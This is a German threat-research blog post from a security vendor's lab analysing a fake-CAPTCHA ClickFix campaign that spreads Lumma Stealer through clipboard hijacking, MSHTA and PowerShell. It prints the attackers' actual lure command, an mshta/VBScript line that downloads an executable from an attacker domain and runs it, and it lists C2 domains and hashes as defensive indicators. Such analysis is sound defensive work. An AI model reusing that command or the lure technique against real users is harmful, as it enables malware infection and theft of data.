• Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Seqrite Labs Blog
Vertrieb kontaktieren Angegriffen?
  • Produkte & Angebote
        • Wolke

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • On Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Plattform

          • Malware Analysis Platform
        • Vertriebspartner

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersicherheit & Data Privacy Aufmerksamkeit
  • Lösungen
    • BFSI
    • Fachwissen
    • Behörden
    • Gesundheitswesen
    • ITeS
    • Industrie
  • Firma
    • Über uns Seqrite
    • Leadership
    • Auszeichnungen & Zertifizierungen
    • Newsroom
  • Partner
    • Partner Programm
    • Partner finden
    • PARTNER WERDEN
  • Unterstützung
  • Ressourcen
    • Blogs
    • Whitepapers
    • Datenblätter
    • Case Studies
    • Bedrohungsberichte
    • Handbücher
    • PoV
    • Ohne fundierte Kenntnisse zu Data Privacy
    • Prüfen Sie Ihre Risikobewertung
    • DPDP-Dialoge
    • Stunde der Privatsphäre
Startseite  /  Technische  / Gefälschtes CAPTCHA lockt Opfer: Lumma-Stealer missbraucht Zwischenablage und PowerShell
Gefälschtes CAPTCHA lockt Opfer: Lumma-Stealer missbraucht Zwischenablage und PowerShell
25 Februar 2025

Gefälschtes CAPTCHA lockt Opfer: Lumma-Stealer missbraucht Zwischenablage und PowerShell

Geschrieben von Soumen Burma
Soumen Burma
Technische

Einführung:

Wir haben kürzlich eine neue Malware-Kampagne identifiziert, die gefälschte CAPTCHA-Seiten verwendet, um Lumma Stealer zu verbreiten, einen Infostealer, der nach dem Malware-as-a-Service-Modell (MaaS) arbeitet und erstmals 2022 entdeckt wurde. In früheren Kampagnen, einschließlich der Kampagnen Mitte 2024, verwendeten Angreifer ClickFix, eine irreführende Taktik mit Phishing und gefälschten reCAPTCHA-Seiten, um gezielt Google-Verifizierungsseiten anzugreifen.

In dieser jüngsten Kampagne nutzen Angreifer weiterhin ClickFix und nutzen Phishing und gefälschte reCAPTCHA-Seiten, um Opfer dazu zu verleiten, schädliche Befehle auszuführen, die in die Zwischenablage kopiert wurden. Mittlerweile konzentrieren sie sich jedoch auf die Nachahmung von Cloudflare-Verifizierungsseiten. Dieser Bericht erläutert die verschiedenen Phasen einer ClickFix-Infektionskette: ClickFix-Seiten, die sich als Cloudflare reCAPTCHA tarnen, und wie sie MSHTA und PowerShell missbrauchen, um einen .NET-Loader bereitzustellen.

Infektionskette:

Die Infektionskette beginnt mit einer gefälschten CAPTCHA-Seite, die das Opfer dazu verleiten soll, den schädlichen Befehl auszuführen. Die Webseite zeigt eine irreführende Meldung wie „Ich bin kein Roboter – Cloudflare-Verifizierung“ an und fordert den Benutzer auf, einen bereitgestellten Befehl im Windows-Ausführen-Dialog zu kopieren und auszuführen. Nach der Ausführung startet der Befehl mshta.exe, das ein eingebettetes VBScript ausführt. Das VBScript erstellt ein WScript.Shell-Objekt zur Ausführung eines Powershell Befehl. PowerShell verwendet dann Invoke-WebRequest, um eine schädliche Nutzlast (g.exe) von einem Remote-Server herunterzuladen und im Download-Ordner zu speichern. Anschließend wird v.exe mit Start-Process ausgeführt, wodurch die nächste Phase des Angriffs eingeleitet wird. Die Datei v.exe fungiert als Loader, der den Lumma Stealer entschlüsselt und in den Speicher einschleust.

Abb. 1: Infektionskette

 

Abb. 2: Gefälschte CAPTCHA-Anweisung

Analyse des eingebetteten JS-Skripts:

Dieses Skript ist darauf ausgelegt, einen Social-Engineering-Angriff auszuführen, indem es Benutzer dazu verleitet, schädliche PowerShell-Befehle zu kopieren und auszuführen. Der Angriff tarnt sich als menschlicher Verifizierungsprozess von Cloudflare und wirkt dadurch legitim, während er im Hintergrund schädliche Aktivitäten ausführt.

Schädliche Nutzdaten in Textbereichselementen:

Das bösartige JS-Skript enthält zwei Textbereichselemente mit eingebetteten schädlichen PowerShell- und MSHTA-Befehlen. Die erste Nutzlast führt einen PowerShell-Befehl aus, der eine schädliche Datei (kyc.mp4) von hxxps[:]//deskbot.net herunterlädt und ausführt. Diese Methode wurde verwendet, um Lumma Stealer auszuliefern, was in der JavaScript-Datei kommentiert ist (siehe Abbildung 3).

Das zweite Textbereichselement verwendet mshta.exe, um ein VBScript auszuführen, das einen PowerShell-Befehl startet.

mshta vbscript:Execute(“CreateObject(“”WScript.Shell””).Run(“”powershell -c iwr 'hxxps[:]//kvndbb3[.]com/g[.]exe' -o $HOME\Downloads\v.exe; Start-Process $HOME\Downloads\v.exe””,0)(window.close) ' Ich bin kein Roboter – Cloudflare-Verifizierungs-ID: 5mUiAHM”)

Es verwendet Invoke-WebRequest (iwr) zum Herunterladen von „g.exe“ ab kvndbb3[.]com und speichert es als „v.exe“ im Download-Ordner. Und führt es weiter mit Start-Process aus. Diese Methode wird als Ausweichtechnik bei Malware-Angriffen verwendet, um Sicherheitsmaßnahmen durch die Nutzung von mshta.exe und WScript.Shell zu umgehen

Abb. 3: Schädliches JScript

 

Abb. 4: Aktuelle Änderungen in JScript

 

Abb. 5: Gefälschte CAPTCHA-Anweisung

Taktiken zur gefälschten menschlichen Verifizierung:

Einer der trügerischsten Aspekte dieses Skripts ist die Verwendung eines gefälschten menschlichen Verifizierungsmechanismus. Es imitiert den Verifizierungsprozess von Cloudflare und suggeriert Nutzern, einen zusätzlichen Schritt ausführen zu müssen. Klickt der Nutzer auf die Verifizierungsschaltfläche, kopiert das Skript den versteckten bösartigen Befehl automatisch in die Zwischenablage. Das Opfer wird dann dazu verleitet, diesen Befehl in sein Terminal einzufügen und auszuführen, wodurch die Schadsoftware heruntergeladen und ausgeführt wird.

Um den Angriff effektiver zu gestalten, enthält das Skript Übersetzungen in mehrere Sprachen (Englisch, Spanisch, Chinesisch, Arabisch, Hindi und mehr). Dies bedeutet, dass der Angreifer ein globales Publikum anspricht, was die Chancen einer erfolgreichen Infektion erhöht.

Mechanismus zur Entführung der Zwischenablage:

Abb. 6: Clipboard Hijacking

Das Skript verwendet eine copyToClipboard() Funktion, die den bösartigen PowerShell-Befehl im versteckten Textbereich auswählt und in die Zwischenablage kopiert, wenn der Benutzer mit der Bestätigungsschaltfläche interagiert. Dies ist eine versteckte Technik, um Benutzer unwissentlich dazu zu bringen, bösartigen Code auszuführen. Wie in Abbildung 3 und Abbildung 5 dargestellt.

Nach dem Kopieren fordert der Angreifer den Benutzer auf, den Befehl in ein PowerShell-Terminal einzufügen und auszuführen. Bei Ausführung wird die Malware heruntergeladen, installiert und möglicherweise dazu verwendet, sich auf dem Computer des Opfers zu verankern.

Analyse des Dotnet Loaders:

Abb. 7. NET Loader

 

Loader nutzt verschiedene Anti-Analyse-Techniken, um Forscher zu behindern und einer Erkennung zu entgehen. Unsere Analyse ergab, dass der Loader die Ausführungszeit überwacht, um Debugging- oder Sandbox-Umgebungen zu erkennen. Diese Überprüfung hilft ihm, potenzielle Analyseversuche zu identifizieren, wie in Abbildung 8 dargestellt.

Abb. 8. Anti-Debugging-Technik

Bei der Analyse des Loaders stellten wir fest, dass dieser die zweite Nutzlast mit einem in Abbildung 9 gezeigten Schlüssel entschlüsselt. Der entschlüsselte Code wird dann in den Prozessspeicher eingefügt mit APIs wie VirtualProtect, gefolgt von WriteProcessMemory und CreateThread, um die eingeschleuste Nutzlast auszuführen. Diese Technik wird häufig verwendet, um der Erkennung zu entgehen und sicherzustellen, dass der Schadcode im Speicher ausgeführt wird, wie in Abbildung 10 unten dargestellt.

Abb. 9. Verwendung des Schlüssels zum Dekodieren der Daten
Abb. 10. Code-Injektion mit Virtual Protect

Analyse der Nutzlast (Lumma Stealer):

Das Nutzlastbeispiel ist ein 32-Bit-Beispiel mit verschlüsselten Daten und Zeichenfolgen.

Abb. 11. Endgültige Nutzlast

Es wird ein Dialogfeld mit der Meldung „Möchten Sie Malware ausführen?“ angezeigt. Dies dient als letzte Überprüfung, bevor mit der Ausführung der Malware fortgefahren wird, wie in Abbildung 12 gezeigt.

Abb. 12. Überprüfung der Malware-Ausführung

 

API-Auflösungsfunktion:

Es verfügt über die Fähigkeit, APIs mithilfe der in Abbildung 13 unten dargestellten API-Hashing-Technik aufzulösen.

Abb. 13: API-Auflösungsfunktion

Datenexfiltration

Das Malware nutzt Windows GDI-APIs, einschließlich BitBlt und CreateCompatibleBitmap, um den gesamten Bildschirm zu erfassen und den erfassten Inhalt als Bitmap-Bild zu speichern.

Abb. 14: Screenshot-Funktion

Außerdem versucht der Schädling, mithilfe der GetClipboardData-API vertrauliche Daten aus der Zwischenablage zu stehlen. Sobald die Daten extrahiert sind, wird eine Command-and-Control-Verbindung (C2C) hergestellt, um die gestohlenen Informationen zu exfiltrieren.

Abb. 15: Funktion zur Datenextraktion aus der Zwischenablage

C2C-Verbindung:

Der Stealer verwendet Mozilla/5.0 in seinem User-Agent-String, um sich bei der Kommunikation mit seinen C2C-Servern in den legitimen Webverkehr einzufügen. Diese Taktik hilft dem Stealer, die Erkennung durch Sicherheitslösungen zu vermeiden, die den Netzwerkverkehr auf Anomalien überwachen.

Abb. 16: Benutzeragent
Abb. 17: C2C-Verbindung

Die Malware nutzt sieben fest codierte Domänen als Befehls- und Kontrollserver, um Updates zu ermöglichen, Befehle zu empfangen und gestohlene Daten zu exfiltrieren.

Fazit:

Die ClickFix-Kampagne zeigt, wie Bedrohungsakteure weiterhin Social-Engineering-Techniken nutzen, um Sicherheitsmaßnahmen zu umgehen und Nutzer zu täuschen. In dieser Kampagne nutzen die Angreifer gefälschte Cloudflare-CAPTCHA-Seiten, die Entführung der Zwischenablage und den Missbrauch von Windows-Dienstprogrammen wie MSHTA und PowerShell, um Lumma Stealer effizient zu verbreiten und auszuführen. Der bei diesem Angriff eingesetzte .NET-Loader enthält Anti-Analyse-Techniken, um der Erkennung zu entgehen. Die Verwendung mehrerer Sprachen in der Kampagne verdeutlicht einen globalen Targeting-Ansatz und macht sie zu einer weit verbreiteten Bedrohung.

MITRE ATT&CK-Techniken:

Name Technik-ID Name
Gefälschte Captcha-Verifizierung T1566 Phishing
PowerShell-Ausführung T1204

T1059.001

Benutzerausführung
Befehls- und Skriptinterpreter: PowerShell
Mshta-Hinrichtung

 

T1218.005

T1027.009

System-Binär-Proxy-Ausführung: Mshta
Verschleierte Dateien oder Informationen: Eingebettete Payloads
Screen Capture T1113 Screen Capture
Die verschlüsselte Nutzlast wurde mit powershell.exe ausgeführt

 

T1059.001

T1027.013

Befehls- und Skriptinterpreter: PowerShell
Verschleierte Dateien oder Informationen: Verschlüsselte/kodierte Datei
Eingabeerfassung T1056 Keylogging
Verteidigungsflucht T1055.012 Prozessinjektion: Prozessaushöhlen

 

Inhaltseinfügung T1659 Einschleusen von Schadcode in Systeme
Command and Control T1071.001 Application Layer Protocol: Webprotokolle

 

 

Schutz:

Trojan.Ghanarava.1739530256ee4fbc
Trojan.Ghanarava.1739337049382d41
Trojan.LummaStealerCiR

IOCs:

MD5 Dateiname
9A926390B4E4EF1EEC4E9E6C80382D41 v.exe
049F8BF92786B0AFF493BC8533EE4FBC Lumma-Nutzlast
C2C
ignoredshee.com
breedertremnd.com
garulouscuto.com
torpdidebar.com
hopeefreamed.com
actiothreaz.com
importenptoc.com
rebeldettern.com
torpdidebar.com
voicesharped.com

 

 

Autoren: 

Soumen Burma

Vaibhav Billade

 

 VORHERIGER ARTIKELDer ROI der Implementierung einer ZTNA-Lösung
NÄCHSTER ARTIKEL  Phishing 2.0: Neue Techniken, mit denen Cyberkriminelle ihre Opfer austricksen
Soumen Burma

Über Soumen Burma

Soumen ist Senior Security Researcher bei Quick Heal Technologies. Seine Interessensgebiete sind Reverse Engineering, Malware-Analyse und...

Artikel von Soumen Burma »

Verwandte Artikel

  • Von der Rechnung zu AnyDesk: Aufdeckung einer Phishing-Kampagne gegen russische Luft- und Raumfahrtorganisationen  

    Juli 7, 2026
  • Operation DragonReturn: Cyber-Spionagekampagne mit China-Netzwerk gegen die Steuerinfrastruktur der indischen Regierung/des Finanzministeriums mittels mehrstufigem DcRAT-Einsatz

    26. Juni 2026
  • Bedrohungsakteure nutzen RAR-Archive als Waffe, um Thailands Gesundheitssektor anzugreifen

    19. Juni 2026
Ausgewählte Autoren
  • Seqrite
    Seqrite

    Seqrite ist ein führender Anbieter von Cybersicherheitslösungen für Unternehmen. Mit dem Fokus auf...

    Lesen Sie weitere Artikel von Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ich bin eine leidenschaftliche Autorin, die gerne Inhalte über neue Technologien verfasst und...

    Lesen Sie weitere Artikel von Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ich bin ein leidenschaftlicher Cybersicherheits-Enthusiast und engagierter Autor. Mit einem besonderen Talent...

    Lesen Sie weitere Artikel von Bineesh P.
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar ist der gemeinsame Geschäftsführer von Quick Heal Technologies ...

    Lesen Sie weitere Artikel von Sanjay Katkar
Themen
geeignet (25) Cyber ​​Attacke (36) Cyber-Angriffe (58) Cyberangriff (16) Cyber-Angriffe (15) Internet-Sicherheit (340) Internet-Sicherheit (34) Cyber-Bedrohung (33) Cyber-Bedrohungen (51) Datenmissbrauch (56) Datenverstöße (29) Data Loss (28) Verhinderung von Datenverlust (34) data privacy (16) Datenschutz gelesen. (34) Datensicherheit (19) DLP (50) DPDP (14) DPDPA (17) Verschlüsselung (16) Endpoint-Sicherheit (112) Unternehmenssicherheit (19) Ausnutzen (13) Datenschutz (14) Malware (76) Malware-Analyse (14) Malware-Angriff (23) MDM (27) Microsoft (15) MITRE ATT & CK (13) Netzwerksicherheit (26) Phishing (30) Ransomware (69) Ransomware-Angriff (31) Ransomware-Angriffe (31) Ransomware-Schutz (16) Seqrite (41) Seqrite Verschlüsselung (27) Seqrite EPS (33) Seqrite Services (16) Bedrohungserkennung (13) Threat IntelLigence (19) UTM (34) Verwundbarkeit (16) null vertrauen (13)
Seqrite Labs

Führender Anbieter von IT-Sicherheitslösungen für Unternehmen, der die Sicherheit von Endpunkten, Daten und Netzwerken mit erstklassigen Lösungen zur Bedrohungsprävention, -erkennung und -reaktion weltweit vereinfacht.

Lesen Sie mehr über Seqrite

Folge uns:

Abonniere unseren Newsletter

Bleiben Sie über die neuesten Trends und Erkenntnisse zur Cybersicherheit auf dem Laufenden.

Laden
Produkte & Angebote
  • Wolke
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • On Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Plattform
  • Malware Analysis Platform
  • Mikrounternehmen
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersicherheit & Data Privacy Aufmerksamkeit
Ressourcen
  • Blogs
  • Whitepapers
  • Datenblätter
  • Bedrohungsberichte
  • Handbücher
  • PoV
  • Ohne fundierte Kenntnisse zu Data Privacy
  • DPDP-Dialoge
  • Einhaltung von Richtlinien
  • EULA
  • GoDeep.AI
  • SIA
  • Stunde der Privatsphäre
Kontakt
  • Sitz der Gesellschaft
  • Reden wir über Cybersicherheit
Unterstützung
  • Technischer Support
  • Software herunterladen
  • Offline-Updater
  • Firmware-Upgrades
  • Upgrades, Modernisierungen & TIPs
  • Produktdokumentation
Über uns
  • Über uns Seqrite
  • Leadership
  • Auszeichnungen & Anerkennungen
  • Newsroom
Partner
  • Partner Programm
  • Partner finden
  • PARTNER WERDEN
  • Seqrite Zertifizierungsanforderungen

© 2026 Quick Heal Technologies Ltd.

Sitemap Datenschutzrichtlinien Rechtliche Hinweise Cookie-Richtlinien Nutzungsbedingungen